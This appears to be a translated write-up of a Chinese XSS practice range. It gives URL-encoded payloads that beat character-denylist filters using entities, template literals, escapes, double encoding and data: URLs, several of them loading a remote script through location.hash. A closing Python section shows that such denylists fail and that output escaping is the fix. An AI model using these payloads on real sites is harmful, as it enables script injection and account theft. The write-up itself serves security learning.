Thanks to the author for the practice range and the ideas. PDF: xss修煉之獨孤九劍.pdf
(image caption: 奇怪的xss姿勢增加了.jpg, "strange new XSS tricks unlocked")
0x01 First Form
Hint: the filter blocks = ( )
Idea: a <script> tag placed inside an <svg> tag is parsed as foreign (SVG) content, so HTML character references in its body are decoded before the script runs, unlike a plain HTML <script>, whose body is raw text. The script body can therefore be written entirely as HTML entities.
alert(1) as HTML entities is: &#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;
The final payload is:
"><svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>
URL-encode it to get: http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b<%2fscript><%2fsvg>
XSS triggered.
Next, load alert.js. The JavaScript to run can be hidden after the # in the URL (the fragment is never sent to the server, so the filter never sees it).
location.hash then returns the # together with everything after it,
location.hash.slice(1) strips the #, and eval(location.hash.slice(1)) executes what is left.
eval(location.hash.slice(1)) as HTML entities is: &#x65;&#x76;&#x61;&#x6c;&#x28;&#x6c;&#x6f;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x2e;&#x68;&#x61;&#x73;&#x68;&#x2e;&#x73;&#x6c;&#x69;&#x63;&#x65;&#x28;&#x31;&#x29;&#x29;
Final payload 1: http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x65%3b%26%23x76%3b%26%23x61%3b%26%23x6c%3b%26%23x28%3b%26%23x6c%3b%26%23x6f%3b%26%23x63%3b%26%23x61%3b%26%23x74%3b%26%23x69%3b%26%23x6f%3b%26%23x6e%3b%26%23x2e%3b%26%23x68%3b%26%23x61%3b%26%23x73%3b%26%23x68%3b%26%23x2e%3b%26%23x73%3b%26%23x6c%3b%26%23x69%3b%26%23x63%3b%26%23x65%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b%26%23x29%3b<%2fscript><%2fsvg>#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
Final payload 2:
http://xcao.vip/test/xss1.php?data=%22%3E%3Cscript%3Eeval.call`${location[%27hash%27][%27slice%27]`1`}`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x02 Second Form
Hint: the filter blocks = ( ) .
The first approach from the First Form still applies. In ES6 syntax a tagged template literal, f`...`, calls f without parentheses, so backticks can stand in for ( ).
setTimeout can therefore be used to trigger the code: setTimeout`code`
In addition, the code can be written with \uXXXX or \xXX escapes to get past the character restriction.
Encode eval(location.hash.slice(1)) in \xXX form:
Final payload: http://xcao.vip/test/xss2.php?data=%22%3E%3Cscript%3EsetTimeout`\x65\x76\x61\x6C\x28\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x61\x73\x68\x2E\x73\x6C\x69\x63\x65\x28\x31\x29\x29`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x03 Third Form
The filter blocks ( ) . & # \ but allows =
With = allowed, simply use <script src='http://xcao.vip/xss/alert.js'></script>
The . is also blocked here, so double-URL-encode it as %252e and it is done (the server decodes the parameter once, leaving %2e, which the browser decodes again when it fetches the URL).
Final payload: http://xcao.vip/test/xss3.php?data=%22%3E%3Cscript%20src=%27http://xcao%252evip/xss/alert%252ejs%27%3E%3C/script%3E
0x04 Fourth Form
The filter blocks = ( ) . & # \
The author's idea is to combine URL encoding with the javascript: pseudo-protocol to get past the filter.
document.location.assign can be written as location['assign'] (location['replace'] works as well), and the javascript: URL then wraps the payload in one more layer of eval.
Final payload: http://xcao.vip/test/xss4.php?data=%22%3E%3Cscript%3Elocation[%27assign%27]`javascript:eval%2528eval%2528location%252ehash%252eslice%25281%2529%2529%2529`%3C/script%3E#with(document)body.appendChild(createElement('script')).src='http://xcao.vip/xss/alert.js'
0x05 Fifth Form
The filter blocks ( ) . & # \ %
The author's idea is to write the host as a decimal IP address to avoid the . character.
Another option is an iframe whose src is a base64 data: URL:
http://xcao.vip/test/xss5.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3Etest%3C/iframe%3E%22}%20%3Ciframe%20src=`%3C/script%3E
0x06 Sixth Form
The filter blocks = ( ) . & # \ %
Building on the Fifth Form, use top['String']['fromCharCode']`61` in place of the equals sign (61 is the character code of =).
Final payload: http://xcao.vip/test/xss6.php?data=1%22%3E%3Cscript%3Etop[%22document%22][%22write%22]`${top[%22String%22][%22fromCharCode%22]`61`%2b%22data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3hjYW8udmlwL3hzcy9hbGVydC5qcz48L3NjcmlwdD4=%3E111%3C/iframe%3E%22}%20%3Ciframe%20src`%3C/script%3E%
An alternative payload: http://xcao.vip/test/xss6.php/?data=%22%3E%3Cscript%3Edocument[%22write%22]`${location[%27hash%27][%27slice%27]`1`}%3Cimg%20`%3C/script%3E#src='x'onerror=with(document)body.appendChild(createElement('script')).src='http://xcao.vip/test/alert.js'//
I will skip forms seven, eight and nine. Have to say, the masters are just too good (tql).
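Every form above defeats the same kind of check: a denylist of characters applied to the raw input. As an added example that is not part of the writeup or the challenge site, the Python below takes the data= values of the first three payloads, shows that the blocked characters only appear once the encoding layers (percent-encoding, HTML entities, \xHH escapes) are peeled off, and contrasts that with the fix that makes the whole series irrelevant: encoding the reflected value for its HTML context. The level names and denylist sets are taken from the hints on this page; the normaliser is my own and deliberately over-decodes, which is acceptable for detection but would break a real parameter.

```python
import html
import re
from urllib.parse import unquote

# The data= values of the writeup's first three payloads, copied from the page.
LEVEL1_DATA = '"><svg><script>%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x28%3b%26%23x31%3b%26%23x29%3b<%2fscript><%2fsvg>'
LEVEL2_DATA = r'%22%3E%3Cscript%3EsetTimeout`\x65\x76\x61\x6C\x28\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x61\x73\x68\x2E\x73\x6C\x69\x63\x65\x28\x31\x29\x29`%3C/script%3E'
LEVEL3_DATA = '%22%3E%3Cscript%20src=%27http://xcao%252evip/xss/alert%252ejs%27%3E%3C/script%3E'

# Character denylists as described by the hints for each level.
LEVEL1_BLOCKED = set('=()')
LEVEL2_BLOCKED = set('=().')
LEVEL3_BLOCKED = set('().&#\\')

# JavaScript \xHH and \uHHHH escapes.
_JS_ESCAPE = re.compile(r'\\(?:x([0-9a-fA-F]{2})|u([0-9a-fA-F]{4}))')


def normalize(value: str, max_rounds: int = 5) -> str:
    """Peel encoding layers until the text stops changing: percent-encoding
    (possibly doubled, as in %252e), HTML character references, and JS escapes.
    Over-decoding is intentional: this is for inspection, not for serving."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)
        decoded = html.unescape(decoded)
        decoded = _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), decoded)
        if decoded == current:
            break
        current = decoded
    return current


def naive_filter_blocks(value: str, blocked: set) -> bool:
    """The style of check the challenge models: denylisted chars in the raw input."""
    return any(c in blocked for c in value)


def normalized_filter_blocks(value: str, blocked: set) -> bool:
    """The same denylist, applied only after normalisation."""
    return naive_filter_blocks(normalize(value), blocked)


def safe_reflect(value: str) -> str:
    """The actual fix for a reflected parameter: encode for the HTML context
    (including quotes) instead of trying to enumerate bad characters."""
    return html.escape(value, quote=True)


if __name__ == '__main__':
    for name, data, blocked in (('xss1', LEVEL1_DATA, LEVEL1_BLOCKED),
                                ('xss2', LEVEL2_DATA, LEVEL2_BLOCKED),
                                ('xss3', LEVEL3_DATA, LEVEL3_BLOCKED)):
        print(name, 'raw check:', naive_filter_blocks(data, blocked),
              'normalised check:', normalized_filter_blocks(data, blocked), normalize(data))
```

The base64 and fromCharCode payloads of the Fifth and Sixth Forms are not caught even by the normaliser, which is the point: denylists chase encodings forever, while safe_reflect closes the injection regardless of how the input is written.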